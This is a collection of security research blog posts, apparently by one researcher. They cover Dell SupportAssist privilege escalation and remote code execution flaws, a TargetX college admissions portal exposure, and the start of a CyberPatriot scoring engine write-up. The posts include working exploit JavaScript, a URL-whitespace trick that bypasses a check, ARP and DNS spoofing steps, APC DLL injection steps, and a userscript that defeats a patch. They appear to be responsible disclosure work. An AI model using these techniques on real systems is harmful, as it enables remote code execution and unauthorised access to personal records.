Clean up the local database of unneeded entries
Clean up log files older than 30 days
Clean up reports older than 5 days (primarily logs sent to Dell)
Clean up analytic data
Registers your device with Dell
Upload all your log files if it's been 30-45 days
Upload any past failed upload attempts
If it's been 14 days since the Agent was first started, issue an "Optimize System" notification.

The important thing to remember is that all of these checks were performed on a daily basis. For us, the last check is most relevant, and it's why Dell users will receive this "Optimize System" notification constantly.

If you haven't run the PC Doctor optimization scan for over 14 days, you'll see this notification every day, how nice. After determining a notification should be created, the method OptimizeSystemTakeOverNotification will call the PushNotification method to issue an "Optimize System" notification.

For most versions of Windows 10, PushNotification will call a method called LaunchUwpApp. LaunchUwpApp takes the following steps:

Grab the active console session ID. This value represents the session ID for the user that is currently logged in.
For every process named "explorer", it will check if its session ID matches the active console session ID.
If the explorer process has the same session ID, the agent will duplicate the token of the process.
Finally, if the duplicated token is valid, the Agent will start a child process named SupportAssistAppWire.exe, with InheritHandles set to true.
SupportAssistAppWire.exe will then create the notification.

The flaw in the code can be seen in the call to CreateProcessAsUser.

As we saw in the Discovery section of this post, SupportAssistAgent.exe, an elevated process running as SYSTEM starts a child process using the unelevated explorer token and sets InheritHandles to true. This means that all inheritable handles that the Agent has will be inherited by the child process. It turns out that the thread handle for the service control handler for the Agent is marked as inheritable.

Exploiting

Now that we have a way of getting a FULL CONTROL thread handle to a SYSTEM process, how do we exploit it? Well, the simplest way I thought of was to call LoadLibrary to load our module. In order to do this, we need to get past a few requirements.

We need to be able to predict the address of a buffer that contains a file path that we can access. For example, if we had a buffer with a predictable address that contained "C:\somepath\etc...", we could write a DLL file to that path and pass LoadLibrary the buffer address.
We need to find a way to use QueueUserApc to call LoadLibrary. This means that we need to have the thread become alertable.

I thought of various ways I could have my string loaded into the memory of the Agent, but the difficult part was finding a way to predict the address of the buffer. Then I had an idea. Does LoadLibrary accept files that don’t have a binary extension?

It appeared so! This meant that the file path in a buffer only needed to be a file we can access; not necessarily have a binary extension such as .exe or .dll. To find a buffer that was already in memory, I opted to use Process Hacker which includes a Strings utility with built-in filtering. I scanned for strings in an Image that contained C:\. The first hit I got shocked me.

Look at the address of the first string, 0x180163f88... was a module running without ASLR? Checking the modules list for the Agent, I saw something pretty scary.

A module named sqlite3.dll had been loaded with a base address of 0x180000000. Checking the module in CFF Explorer confirmed my findings.

The DLL was built without the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE characteristic, meaning that ASLR was disabled for it. Somehow this got into the final release build of a piece of software deployed on millions of endpoints. This weakness makes our lives significantly easier because the buffer contained the path c:\dev\sqlite\core\sqlite3.pdb, a file path we could access!

We already determined that the extension makes no difference meaning that if I write a DLL to c:\dev\sqlite\core\sqlite3.pdb and pass the buffer pointer to LoadLibrary, the module we wrote to c:\dev\sqlite\core\sqlite3.pdb should be loaded.

Now that we got the first problem sorted, the next part of our exploitation is to get the thread to be alertable. What I found in my testing is that this thread was the service control handler for the Agent. This meant that the thread was in a Wait Non-Alertable state because it was waiting for a service control signal to come through.

Checking the service permissions for the Agent, I found that the INTERACTIVE group had some permissions. Luckily, INTERACTIVE includes unprivileged users, meaning that the permissions applied directly to us.

Both Interrogate and User-defined control sends a service signal to the thread, meaning we can get out of the Wait state. Since the thread continued execution after receiving a service control signal, we can use SetThreadContext and set the RIP pointer to a target function. The function NtTestAlert was perfect for this situation because it immediately makes the thread alertable and executes our APCs.

To summarize the exploitation process:

The stager monitors for the child SupportAssistAppWire.exe process.
The stager writes a malicious APC DLL to C:\dev\sqlite\core\sqlite3.pdb.
Once the child process is created, the stager injects our malicious DLL into the process.
The DLL finds the leaked thread handle using a brute-force method (NtQuerySystemInformation works just as well).
The DLL sets the RIP register of the Agent's thread to NtTestAlert.
The DLL queues an APC passing in LoadLibraryA for the user routine and 0x180163f88 (buffer pointer) as the first argument.
The DLL issues an INTERROGATE service control to the service.
The Agent then goes to NtTestAlert triggering the APC which causes the APC DLL to be loaded.
The APC DLL starts our malicious binary (for the PoC it's command prompt) while in the context of a SYSTEM process, causing local privilege escalation.

Dell's advisory can be accessed here.

Demo

Privacy concerns

After spending a long time reversing the Dell SupportAssist agent, I've come across a lot of practices that are in my opinion very questionable. I'll leave it up to you, the reader, to decide what you consider acceptable.

On most exceptions, the agent will send the exception detail along with your service tag to Dell's servers.
Whenever a file is executed for Download and Auto install, Dell will send the file name, your service tag, the status of the installer, and the logs for that install to their servers.
Whenever you scan for driver updates, any updates found will be sent to Dell’s servers alongside your service tag.
Whenever Dell retrieves scan results about your bios, pnp drivers, installed programs, and operating system information, all of it is uploaded to Dell servers.
Every week your entire log directory is uploaded to Dell servers (yes, Dell logs by default).
Every two weeks, Dell uploads a “heartbeat” including your device details, alerts, software scans, and much more.

You can disable some of this, but it’s enabled by default. Think about the millions of endpoints running Dell SupportAssist…

Timeline

04/25/2019 - Initial write up and proof of concept sent to Dell.

04/26/2019 - Initial response from Dell.

05/08/2019 - Dell has confirmed the vulnerability.

05/27/2019 - Dell has a fix ready to be released within 2 weeks.

06/19/2019 - Vulnerability disclosed by Dell as an advisory.

06/28/2019 - Vulnerability disclosed at RECON Montreal 2019.

Remote Code Execution on most Dell computers

Bill Demirkapi — Tue, 30 Apr 2019 12:52:00 GMT

What computer do you use? Who made it? Have you ever thought about what came with your computer? When we think of Remote Code Execution (RCE) vulnerabilities in mass, we might think of vulnerabilities in the operating system, but another attack vector to consider is "What third-party software came with my PC?". In this article, I'll be looking at a Remote Code Execution vulnerability I found in Dell SupportAssist, software meant to "proactively check the health of your system’s hardware and software" and which is "preinstalled on most of all new Dell devices".

Discovery

Back in September, I was in the market for a new laptop because my 7-year-old Macbook Pro just wasn't cutting it anymore. I was looking for an affordable laptop that had the performance I needed and I decided on Dell's G3 15 laptop. I decided to upgrade my laptop's 1 terabyte hard drive to an SSD. After upgrading and re-installing Windows, I had to install drivers. This is when things got interesting. After visiting Dell's support site, I was prompted with an interesting option.

"Detect PC"? How would it be able to detect my PC? Out of curiosity, I clicked on it to see what happened.

A program which automatically installs drivers for me. Although it was a convenient feature, it seemed risky. The agent wasn't installed on my computer because it was a fresh Windows installation, but I decided to install it to investigate further. It was very suspicious that Dell claimed to be able to update my drivers through a website.

Installing it was a painless process with just a click to install button. In the shadows, the SupportAssist Installer created the SupportAssistAgent and the Dell Hardware Support service. These services corresponded to .NET binaries making it easy to reverse engineer what it did. After installing, I went back to the Dell website and decided to check what it could find.

I opened the Chrome Web Inspector and the Network tab then pressed the "Detect Drivers" button.

The website made requests to port 8884 on my local computer. Checking that port out on Process Hacker showed that the SupportAssistAgent service had a web server on that port. What Dell was doing is exposing a REST API of sorts in their service which would allow communication from the Dell website to do various requests. The web server replied with a strict Access-Control-Allow-Origin header of https://www.dell.com to prevent other websites from making requests.

On the web browser side, the client was providing a signature to authenticate various commands. These signatures are generated by making a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken which also provides when the signature expires. After pressing download drivers on the web side, this request was of particular interest:

POST http://127.0.0.1:8884/downloadservice/downloadmanualinstall?expires=expiretime&signature=signature
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Origin: https://www.dell.com
Referer: https://www.dell.com/support/home/us/en/19/product-support/servicetag/xxxxx/drivers?showresult=true&files=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

The body:

[
    {
    "title":"Dell G3 3579 and 3779 System BIOS",
    "category":"BIOS",
    "name":"G3_3579_1.9.0.exe",
    "location":"https://downloads.dell.com/FOLDER05519523M/1/G3_3579_1.9.0.exe?uid=29b17007-bead-4ab2-859e-29b6f1327ea1&fn=G3_3579_1.9.0.exe",
    "isSecure":false,
    "fileUniqueId":"acd94f47-7614-44de-baca-9ab6af08cf66",
    "run":false,
    "restricted":false,
    "fileId":"198393521",
    "fileSize":"13 MB",
    "checkedStatus":false,
    "fileStatus":-99,
    "driverId":"4WW45",
    "path":"",
    "dupInstallReturnCode":"",
    "cssClass":"inactive-step",
    "isReboot":true,
    "DiableInstallNow":true,
    "$$hashKey":"object:175"
    }
]

It seemed like the web client could make direct requests to the SupportAssistAgent service to "download and manually install" a program. I decided to find the web server in the SupportAssistAgent service to investigate what commands could be issued.

On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on either port 8884, 8883, 8886, or port 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest.

ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks for example making sure the request came from the local machine and various other checks. Later in this article, we’ll get into some of the issues in the integrity checks, but for now most are not important to achieve RCE.

An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks to make sure my referrer is from Dell. ProcessRequest calls the following function to ensure that I am from Dell:

// Token: 0x060000A8 RID: 168 RVA: 0x00004EA0 File Offset: 0x000030A0
public static bool ValidateDomain(Uri request, Uri urlReferrer)
{
	return SecurityHelper.ValidateDomain(urlReferrer.Host.ToLower()) && (request.Host.ToLower().StartsWith("127.0.0.1") || request.Host.ToLower().StartsWith("localhost")) &&request.Scheme.ToLower().StartsWith("http") && urlReferrer.Scheme.ToLower().StartsWith("http");
}

// Token: 0x060000A9 RID: 169 RVA: 0x00004F24 File Offset: 0x00003124
public static bool ValidateDomain(string domain)
{
	return domain.EndsWith(".dell.com") || domain.EndsWith(".dell.ca") || domain.EndsWith(".dell.com.mx") || domain.EndsWith(".dell.com.br") || domain.EndsWith(".dell.com.pr") || domain.EndsWith(".dell.com.ar") || domain.EndsWith(".supportassist.com");
}

The issue with the function above is the fact that it really isn’t a solid check and gives an
attacker a lot to work with. To bypass the Referer/Origin check, we have a few options:

Find a Cross Site Scripting vulnerability in any of Dell’s websites (I should only have to
find one on the sites designated for SupportAssist)
Find a Subdomain Takeover vulnerability
Make the request from a local program
Generate a random subdomain name and use an external machine to DNS Hijack the victim. Then, when the victim requests [random].dell.com, we respond with our server.

In the end, I decided to go with option 4, and I’ll explain why in a later bit. After verifying the Referer/Origin of the request, ProcessRequest sends the request to corresponding functions for GET, POST, and OPTIONS.

When I was learning more about how Dell SupportAssist works, I intercepted different types of requests from Dell’s support site. Luckily, my laptop had some pending updates, and I was able to intercept requests through my browsers console.

At first, the website tries to detect SupportAssist by looping through the aformentioned service ports and connecting to the Service Method “isalive”. What was interesting was that it was passing a “Signature” parameter and a “Expires” parameter. To find out more, I reversed the javascript side of the browser. Here’s what I found out:

First, the browser makes a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken and gets the latest “Token”, or the signatures I was talking about earlier. The endpoint also provides the “Expires token”. This solves the signature problem.
Next, the browser makes a request to each service port with a style like this: http://127.0.0.1:[SERVICEPORT]/clientservice/isalive/?expires=[EXPIRES]&signature=[SIGNATURE].
The SupportAssist client then responds when the right service port is reached, with a style like this:

{
	"isAlive": true,
	"clientVersion": "[CLIENT VERSION]",
	"requiredVersion": null,
	"success": true,
	"data": null,
	"localTime": [EPOCH TIME],
	"Exception": {
		"Code": null,
		"Message": null,
		"Type": null
	}
}

Once the browser sees this, it continues with further requests using the now determined
service port.

Some concerning factors I noticed while looking at different types of requests I could make is that I could get a very detailed description of every piece of hardware connected to my computer using the “getsysteminfo” route. Even through Cross Site Scripting, I was able to access this data, which is an issue because I could seriously fingerprint a system and find some sensitive information.

Here are the methods the agent exposes:

clientservice_getdevicedrivers - Grabs available updates.
diagnosticsservice_executetip - Takes a tip guid and provides it to the PC Doctor service (Dell Hardware Support).
downloadservice_downloadfiles - Downloads a JSON array of files.
clientservice_isalive - Used as a heartbeat and returns basic information about the agent.
clientservice_getservicetag - Grabs the service tag.
localclient_img - Connects to SignalR (Dell Hardware Support).
diagnosticsservice_getsysteminfowithappcrashinfo - Grabs system information with crash dump information.
clientservice_getclientsysteminfo - Grabs information about devices on system and system health information optionally.
diagnosticsservice_startdiagnosisflow - Used to diagnose issues on system.
downloadservice_downloadmanualinstall - Downloads a list of files but does not execute them.
diagnosticsservice_getalertsandnotifications - Gets any alerts and notifications that are pending.
diagnosticsservice_launchtool - Launches a diagnostic tool.
diagnosticsservice_executesoftwarefixes - Runs remediation UI and executes a certain action.
downloadservice_createiso - Download an ISO.
clientservice_checkadminrights - Check if the Agent privileged.
diagnosticsservice_performinstallation - Update SupportAssist.
diagnosticsservice_rebootsystem - Reboot system.
clientservice_getdevices - Grab system devices.
downloadservice_dlmcommand - Check on the status of or cancel an ongoing download.
diagnosticsservice_getsysteminfo - Call GetSystemInfo on PC Doctor (Dell Hardware Support).
downloadservice_installmanual - Install a file previously downloaded using downloadservice_downloadmanualinstall.
downloadservice_createbootableiso - Download bootable iso.
diagnosticsservice_isalive - Heartbeat check.
downloadservice_downloadandautoinstall - Downloads a list of files and executes them.
clientservice_getscanresults - Gets driver scan results.
downloadservice_restartsystem - Restarts the system.

The one that caught my interest was downloadservice_downloadandautoinstall. This method would download a file from a specified URL and then run it. This method is ran by the browser when the user needs to install certain drivers that need to be installed automatically.

After finding which drivers need updating, the browser makes a POST request to “http://127.0.0.1:[SERVICE PORT]/downloadservice/downloadandautoinstall?expires=[EXPIRES]&signature=[SIGNATURE]”.
The browser sends a request with the following JSON structure:

[
	{
	"title":"DOWNLOAD TITLE",
	"category":"CATEGORY",
	"name":"FILENAME",
	"location":"FILE URL",
	"isSecure":false,
	"fileUniqueId":"RANDOMUUID",
	"run":true,
	"installOrder":2,
	"restricted":false,
	"fileStatus":-99,
	"driverId":"DRIVER ID",
	"dupInstallReturnCode":0,
	"cssClass":"inactive-step",
	"isReboot":false,
	"scanPNPId":"PNP ID",
	"$$hashKey":"object:210"
	}
]

After doing the basic integrity checks we discussed before, ClientServiceHandler.ProcessRequest sends the ServiceMethod and the parameters we passed to ClientServiceHandler.HandlePost.
ClientServiceHandler.HandlePost first puts all parameters into a nice array, then calls ServiceMethodHelper.CallServiceMethod.
ServiceMethodHelper.CallServiceMethod acts as a dispatch function, and calls the function given the ServiceMethod. For us, this is the “downloadandautoinstall” method:

if (service_Method == "downloadservice_downloadandautoinstall")
{
	string files5 = (arguments != null && arguments.Length != 0 && arguments[0] != null) ? arguments[0].ToString() : string.Empty;
	result = DownloadServiceLogic.DownloadAndAutoInstall(files5, false);
}

Which calls DownloadServiceLogic.DownloadAutoInstall and provides the files we sent in the JSON payload.
6. DownloadServiceLogic.DownloadAutoInstall acts as a wrapper (i.e handling exceptions) for DownloadServiceLogic._HandleJson.
7. DownloadServiceLogic._HandleJson deserializes the JSON payload containing the list of files to download, and does the following integrity checks:

foreach (File file in list)
{
	bool flag2 = file.Location.ToLower().StartsWith("http://");
	if (flag2)
	{
		file.Location = file.Location.Replace("http://", "https://");
	}
	bool flag3 = file != null && !string.IsNullOrEmpty(file.Location) && !SecurityHelper.CheckDomain(file.Location);
	if (flag3)
	{
		DSDLogger.Instance.Error(DownloadServiceLogic.Logger, "InvalidFileException being thrown in _HandleJson method");
		throw new InvalidFileException();
	}
}
DownloadHandler.Instance.RegisterDownloadRequest(CreateIso, Bootable, Install, ManualInstall, list);

The above code loops through every file, and checks if the file URL we provided doesn’t start with http:// (if it does, replace it with https://), and checks if the URL matches a list of Dell’s download servers (not all subdomains):

public static bool CheckDomain(string fileLocation)
{
	List list = new List
	{
		"ftp.dell.com",
		"downloads.dell.com",
		"ausgesd4f1.aus.amer.dell.com"
	};
	
	return list.Contains(new Uri(fileLocation.ToLower()).Host);
}

Finally, if all these checks pass, the files get sent to DownloadHandler.RegisterDownloadRequest at which point the SupportAssist downloads and runs the files as Administrator.

This is enough information we need to start writing an exploit.

Exploitation

The first issue we face is making requests to the SupportAssist client. Assume we are in the context of a Dell subdomain, we’ll get into how exactly we do this further in this section. I decided to mimic the browser and make requests using javascript.

First things first, we need to find the service port. We can do this by polling through the predefined service ports, and making a request to “/clientservice/isalive”. The issue is that we need to also provide a signature. To get the signature that we pass to isalive, we can make a request to “https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken”.

This isn’t as straight-forwards as it might seem. The “Access-Control-Allow-Origin” of the signature url is set to “https://www.dell.com”. This is a problem, because we’re in the context of a subdomain, probably not https. How do we get past this barrier? We make the request from our own servers!

The signatures that are returned from “getdsdtoken” are applicable to all machines, and not unique. I made a small PHP script that will grab the signatures:

The header call allows anyone to make a request to this PHP file, and we just echo the signatures, acting as a proxy to the “getdsdtoken” route. The “getdsdtoken” route returns JSON with signatures and an expire time. We can just use JSON.parse on the results to place the signatures into a javascript object.

Now that we have the signature and expire time, we can start making requests. I made a small function that loops through each server port, and if we reach it, we set the server_port variable (global) to the port that responded:

function FindServer() {
	ports.forEach(function(port) {
		var is_alive_url = "http://127.0.0.1:" + port + "/clientservice/isalive/?expires=" + signatures.Expires + "&signature=" + signatures.IsaliveToken;
		var response = SendAsyncRequest(is_alive_url, function(){server_port = port;});
	});
}

After we have found the server, we can send our payload. This was the hardest part, we have some serious obstacles before “downloadandautoinstall” executes our payload.

Starting with the hardest issue, the SupportAssist client has a hard whitelist on file locations. Specifically, its host must be either "ftp.dell.com", "downloads.dell.com", or "ausgesd4f1.aus.amer.dell.com". I almost gave up at this point, because I couldn’t find an open redirect vulnerability on any of the sites. Then it hit me, we can do a man-in-the-middle attack.

If we could provide the SupportAssist client with a http:// URL, we could easily intercept and change the response! This somewhat solves the hardest challenge.

The second obstacle was designed specifically to counter my solution to the first obstacle. If we look back to the steps I outlined, if the file URL starts with http://, it will be replaced by https://. This is an issue, because we can’t really intercept and change the contents of a proper https connection. The key bypass to this mitigation was in this sentence: “if the URL starts with http://, it will be replaced by https://”. See, the thing was, if the URL string did not start with http://, even if there was http:// somewhere else in the string, it wouldn’t replace it. Getting a URL to work was tricky, but I eventually came up with “ http://downloads.dell.com/abcdefg” (the space is intentional). When you ran the string through the starts with check, it would return false, because the string starts with “ “, thus leaving the “http://” alone.

I made a function that automated sending the payload:

function SendRCEPayload() {
	var auto_install_url = "http://127.0.0.1:" + server_port + "/downloadservice/downloadandautoinstall?expires=" + signatures.Expires + "&signature=" + signatures.DownloadAndAutoInstallToken;

	var xmlhttp = new XMLHttpRequest();
	xmlhttp.open("POST", auto_install_url, true);

	var files = [];
	
	files.push({
	"title": "SupportAssist RCE",
	"category": "Serial ATA",
	"name": "calc.EXE",
	"location": " http://downloads.dell.com/calc.EXE", // those spaces are KEY
	"isSecure": false,
	"fileUniqueId": guid(),
	"run": true,
	"installOrder": 2,
	"restricted": false,
	"fileStatus": -99,
	"driverId": "FXGNY",
	"dupInstallReturnCode": 0,
	"cssClass": "inactive-step",
	"isReboot": false,
	"scanPNPId": "PCI\\VEN_8086&DEV_282A&SUBSYS_08851028&REV_10",
	"$$hashKey": "object:210"});
	
	xmlhttp.send(JSON.stringify(files)); 
}

Next up was the attack from the local network. Here are the steps I take in the external portion of my proof of concept (attacker's machine):

Grab the interface IP address for the specified interface.
Start the mock web server and provide it with the filename of the payload we want to send. The web server checks if the Host header is downloads.dell.com and if so sends the binary payload. If the request Host has dell.com in it and is not the downloads domain, it sends the javascript payload which we mentioned earlier.
To ARP Spoof the victim, we first enable ip forwarding then send an ARP packet to the victim telling it that we're the router and an ARP packet to the router telling it that we're the victim machine. We repeat these packets every few seconds for the duration of our exploit. On exit, we will send the original mac addresses to the victim and router.
Finally, we DNS Spoof by using iptables to redirect DNS packets to a netfilter queue. We listen to this netfilter queue and check if the requested DNS name is our target URL. If so, we send a fake DNS packet back indicating that our machine is the true IP address behind that URL.
When the victim visits our subdomain (either directly via url or indirectly by an iframe), we send it the malicious javascript payload which finds the service port for the agent, grabs the signature from the php file we created earlier, then sends the RCE payload. When the RCE payload is processed by the agent, it will make a request to downloads.dell.com which is when we return the binary payload.

You can read Dell's advisory here.

Demo

Here's a small demo video showcasing the vulnerability. You can download the source code of the proof of concept here.

The source code of the dellrce.html file featured in the video is:

CVE-2019-3719
Nothing suspicious here... move along...

Timeline

10/26/2018 - Initial write up sent to Dell.

10/29/2018 - Initial response from Dell.

11/22/2018 - Dell has confirmed the vulnerability.

11/29/2018 - Dell scheduled a "tentative" fix to be released in Q1 2019.

01/28/2019 - Disclosure date extended to March.

03/13/2019 - Dell is still fixing the vulnerability and has scheduled disclosure for the end of April.

04/18/2019 - Vulnerability disclosed as an advisory.

Hacking College Admissions

Bill Demirkapi — Sat, 13 Apr 2019 14:13:00 GMT

Getting into college is one of the more stressful time of a high school student's life. Since the admissions process can be quite subjective, students have to consider a variety of factors to convince the admissions officers that "they're the one". Some families do as much as they can to improve their chances - even going as far as trying to cheat the system. For wealthier families, this might be donating a very large amount to the school or as we've heard in the news recently, bribing school officials.

If you don't know about me already, I'm a 17-year-old high school senior that has an extreme interest in the information security field and was part of the college admissions process this year. Being part of the college admissions process made me interested in investigating, "Can you hack yourself into a school?". In this article, I'll be looking into TargetX, a "Student Lifecycle Solution for Higher Education" that serves several schools. All of this research was because of my genuine interest in security, not because I wanted to get into a school through malicious means.

Investigation

The school I applied to that was using TargetX was the Worcester Polytechnic Institute in Worcester, Massachusetts. After submitting my application on the Common App, an online portal used to apply to hundreds of schools, I received an email to register on their admissions portal. The URL was the first thing that shot out at me, https://wpicommunity.**force.com**/apply. Force.com reminded me of Salesforce and at first I didn't think Salesforce did college admissions portals. Visiting force.com brought me to their product page for their "Lightning Platform" software. It looked like it was a website building system for businesses. I thought the college might have made their own system, but when I looked at the source of the registration page it referred to something else called TargetX. This is how I found out that TargetX was simply using Salesforce's "Lightning Platform" to create a college admissions portal.

After registering, I started to analyze what was being accessed. At the same time, I was considering that this was a Salesforce Lightning Platform. First, I found their REST api platform hinged on a route called "apexremote", this turned out to be Salesforce's way of exposing classes to clients through REST. Here is the documentation for that. Fortunately, WPI had configured it correctly so that you could only access API's that you were supposed to access and it was pretty shut down. I thought about other API's Salesforce might expose and found out they had a separate REST/SOAP API too. In WPI's case, they did a good job restricting this API from student users, but in general this is a great attack vector (I found this API exposed on a different Salesforce site).

After digging through several javascript files and learning more about the platform, I found out that Salesforce had a user interface backend system. I decided to try to access it and so I tried a random URL: /apply/_ui/search/ui/aaaaa. This resulted in a page that looked like this:

It looked like a standard 404 page. What caught my eye was the search bar on the top right. I started playing around with the values and found out it supported basic wildcards. I typed my name and used an asterick to see if I could find anything.

Sorry for censoring, but the details included some sensitive details. It seemed as though I could access my own "Application Form" and contact. I was not able to access the application of any other students which gave a sigh of relief, but it soon turned out that just being able to access my own application was severe enough.

After clicking on my name in the People section, I saw that there was an application record assigned to me. I clicked on it and then it redirected me to a page with a significant amount of information.

Here's a generalized list of everything I was able to access:

General application information
Decision information (detailed list of different considered factors)
Decision dates
Financial Aid information
GPA
Enrollment information
Decision information (misc. options i.e to show decision or not)
Recommendations (able to view them)
SAT / ACT Scores
High school transcript
Perosnal statement
Application fee

Here's where it gets even worse, I can edit everything I just listed above. For example:

Don't worry, I didn't accept myself into any schools or make my SAT Scores a 1600.

Initial contact

After finding this vulnerability, I immediately reached out to WPI's security team the same day to let them know about the vulnerabilities I found. They were very receptive and within a day they applied their first "patch". Whenever I tried accessing the backend panel, I would see my screen flash for a quick second and then a 404 Message popped up.

The flash had me interested, upon reading the source code of the page, I found all the data still there! I was very confused and diff'd the source code with an older copy I had saved. This is the javascript blocked that got added:

if (typeof sfdcPage != 'undefined') {
    if (window.stop) {
        window.stop();
    } else {
        document.execCommand("Stop");
    }
    /*lil too much*/
    if (typeof SimpleDialog != 'undefined') {
        var sd = new SimpleDialog("Error" + Dialogs.getNextId(), false);
        sd.setTitle("Error");
        sd.createDialog();
        window.parent.sd = sd;
        sd.setContentInnerHTML("
404 Page not found.

");
        sd.show();
    }
    document.title = "Error 404";
}

This gave me a good chuckle. What they were doing was stopping the page from loading and then replacing the HTML with a 404 error. I could just use NoScript, but I decided to create a simple userscript to disable their tiny "fix".

(function() {
    'use strict';

    if(document.body.innerHTML.includes("404 Page not found.")) {
        window.stop();
        const xhr = new XMLHttpRequest();
        xhr.open('GET', window.location.href);
        xhr.onload = () => {
            var modified_html = xhr.responseText
            .replace(//g, s => {
                if (s.includes("lil too much"))
                    return ""; // Return nothing for the script content
                return s;
            });
            document.open();
            document.write(modified_html);
            document.close();
        };
        xhr.send();
    }
})();

Basically, this userscript will re-request the page and remove any "404" script blocks then set the current page to the updated html. It worked great and bypassed their fix. As suspected, WPI only put a "band aid over the issue" to stop any immediate attacks. What I later learned when looking at some other schools was that TargetX themselves added the script under the name "TXPageStopper" - this wasn't just WPI's fix.

It's important to note that if you tried this today, sure the 404 page would be removed, but nothing is accessible. They've had this patch since January and after doing a real patch to fix the actual issue, they just never removed the 404 page stopper.

Remediation?

This is going to be a small section about my interactions with WPI after sending them the vulnerability details. I first found and reported this vulnerability back in January, specifically the third. WPI was very responsive (often replied within hours). I contacted them on February 14th again asking how the vulnerability patch was going and whether or not this was a vulnerability in only WPI or it was a vulnerability in TargetX too. Again within an hour, WPI responded saying that they have fixed the issues and that they had a "final meeting set up for the incident review". They said, "It was a combination of a TargetX vulnerability as well as tightening up some of our security settings".

I immediately (within 8 minutes) replied to their email asking for the TargetX side of the vulnerability to apply for a CVE. This is when things turned sour. Five days past and there was no reply. I sent a follow-up email to check in. I sent another follow up the next week and the week after that. Complete radio silence. By March 16th, I decided to send a final email letting them know that I had intended to publish about the vulnerability that week, but this time I CC'd the boss of the person I was in contact with.

Within a day, on a Sunday, the boss replied saying that they had not been aware that I was waiting on information. This is specifically what that email said:

We will reach out to TargetX tomorrow and determine and confirm the exact details of what we are able to release to you. I will be in touch in a day or two with additional information once we have talked with TargetX. We would prefer that you not release any blog posts until we can follow-up with TargetX. Thank you.

Of course if the vulnerability had not been completely patched yet, I did not want to bring any attention to it. I sent back an email appreciating their response and that I looked forward to their response.

A week past. I sent a follow up email asking on the status of things. No response. I sent another follow up the next week and this time I mentioned that I again was planning to publish. Radio silence.

It has been about a week since I sent that email and because I have had no response from them, I decided to publish given that they had said they had patched the vulnerability and because I could not extract any more data.

Other schools impacted

I named this post "Hacking College Admissions" because this vulnerability was not just in WPI. Besides WPI confirming this to me themselves, I found similar vulnerabilities in other schools that were using the TargetX platform.

To find other schools impacted, I found all of the subdomains of force.com and tried to find universities. I am sure I missed some schools, but this is a small list of the other schools affected.

Antioch University
Arcadia University
Averett University
Bellevue University
Berklee College of Music
Boston Architechtural College
Boston University
Brandman University
Cabrini University
California Baptist University
California School Of The Arts, San Gabriel Valley
Cardinal University
City Year
Clarion University of Pennsylvania
Columbia College
Concordia University, Irvine
Concordia University, Montreal
Concordia University, Oregon
Concordia University, Texas
Delaware County Community College
Dominican University
ESADE Barcelona
East Oregon University
Eastern University
Embry-Riddle Aeronautical University
Fashion Institute of Design & Merchandising
George Mason University
George Washington University
Grove City College
Harvard Kennedy School
Hood College
Hope College
Illinois Institute of Technology
International Technological University
Johnson & Wales University
Keene State College
Laguna College
Lebanon Valley College
Lehigh Carbon Community College
London School of Economics and Political Science
Mary Baldwin University
Master's University
Morovian College
Nazareth College
New York Institute of Technology
Oregon State University
Pepperdine University
Piedmont College
Plymouth State University
Regis College
Saint Mary's University of Minnesota
Simpson University
Skagit Valley College
Summer Discovery
Texas State Technical College
Townson University
USC Palmetto College
University of Akron
University of Arizona, Eller MBA
University of California, Davis
University of California, San Diego
University of California, Santa Barbara
University of Dayton
University of Houston
University of Maine
University of Michigan-Dearborn
University of Nevada, Reno
University of New Hampshire
University of New Haven
University of Texas, Dallas
University of Virginia
University of Washington
Universwity of Alabama, Birmingham
West Virginia University
Western Connecticut University
Western Kentucky University
Western Michigan University
Wisconsin Indianhead Technical College
Worcester Polytechnic Institute
Wright State University

There are some schools that appeared to be running on the same Salesforce platform, but on a custom domain which is probably why I missed schools.

Conclusion

It turns out, having lots of money isn't the only way to get into your dream college and yes, you can "Hack yourself into a school". The scary part about my findings was that at least WPI was vulnerable since they implemented the Salesforce system in 2012. Maybe students should be taking a better look at the systems around them, because all I can imagine is if someone found something like this and used it to cheat the system.

I hope you enjoyed the article and feel free to message me if you have any questions.

Reversing the CyberPatriot National Competition Scoring Engine

Bill Demirkapi — Fri, 12 Apr 2019 22:10:00 GMT

Edit 4/12/2019

Originally, I published this post a month ago. After my post, I received a kind email from one of the primary developers for CyberPatriot asking that I take my post down until they can change their encryption algorithm. Given that the national competition for CyberPatriot XI was in a month, I decided to take the post down until after national competitions completed. National competitions ended yesterday which is why I am re-publishing this write up now.

Disclaimer

This article pertains to the competitions prior to 2018, as I have stopped participating in newer competitions and therefore no longer subject to the competition’s rule book. This information is meant for educational use only and as fair use commentary for the competition in past years.

Preface

CyberPatriot is the air force association's "national youth cyber education program". The gist of the competition is that competitors (teams around the nation) are given virtual machines that are vulnerable usually due to configuration issues or malicious files. Competitors must find and patch these holes to gain points.

The points are calculated by the CyberPatriot Scoring Engine, a program which runs on the vulnerable virtual machine and does routine checks on different aspects of the system that are vulnerable to see if they were patched.

I am a high school senior who participated in the competition 2015-2016, 2016-2017, 2017-2018 for a total of 3 years. My team got to regionals consistently and once got under the 12th place cut-off for an hour. The furthest my team got was regionals (once even got under 12th place for a good hour, which is the cut off for nationals). I did not participate this year because unfortunately the organization which was hosting CyberPatriot teams, ours included, stopped due to the learning curve.

This all started when I was cleaning up my hard drive to clear up some space. I found an old folder called "CyberPatriot Competition Images" and decided to take a look. In the years I was competing in CyberPatriot, I had some reversing knowledge, but it was nothing to compared to what I can do today. I thought it would be a fun experiment to take a look at the most critical piece of the CyberPatriot infrastructure - the scoring engine. In this article, I'm going to be taking an in-depth look into the CyberPatriot scoring engine, specifically for the 2017-2018 (CyberPatriot X) year.

General Techniques

